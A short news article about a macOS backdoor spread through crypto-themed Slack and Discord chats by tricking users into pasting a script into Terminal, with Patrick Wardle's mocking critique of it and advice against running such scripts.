Security researchers have revealed that a controversial malware is targeting MacOS users talking about cryptocurrencies on Slack and Discord.
“Dumb” MacOS Attack
The malware was first reported by Remco Verhoef of SANS. He explained that the attacks would impersonate “key people” in chats which are related to cryptocurrencies and then share malicious scripts.
The wrongdoers would try to encourage users to paste the script into the Terminal window of their Macs which would send a command to download 34MB file and execute it. In turn, this would establish a remote connection which would act as a backdoor for the hackers.
The obvious flaws in the plan of the attackers caught the attention of Patrick Wardle, a Mac malware expert. In a more detailed blog post, he noted that:
- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it’s trivial to detect at every step (that dumb)
- … and finally, the malware saves the user’s password to dumpdummy
Common Sense is the Only Protection You Need
The binary executes a set of libraries, including those of Open SSL, which encrypt its communications back to the server. Remco Verhoef managed to establish that the bash script attempts to connect to a system which belongs to CrownCloud – a German hosting provider.
Once the binary is executed, it would provide the attacker with the ability to successfully execute command-line codes as if he is the root user of the MacOS which is infected.
In order for this to happen, however, the owner of the Mac needs to enter a password, allowing the script to go on. Ironically, the script would store said password in a temporary file which is named “dumpdummy,” as noted by Wardle.
In other words, all you have to do to prevent this malware from causing any damage is refrain from pasting a script provided to you by someone on Slack or Discord on your Terminal window.
What do you think of this malware targeting MacOS users? Don’t hesitate to let us know in the comments below.
Images courtesy of Shutterstock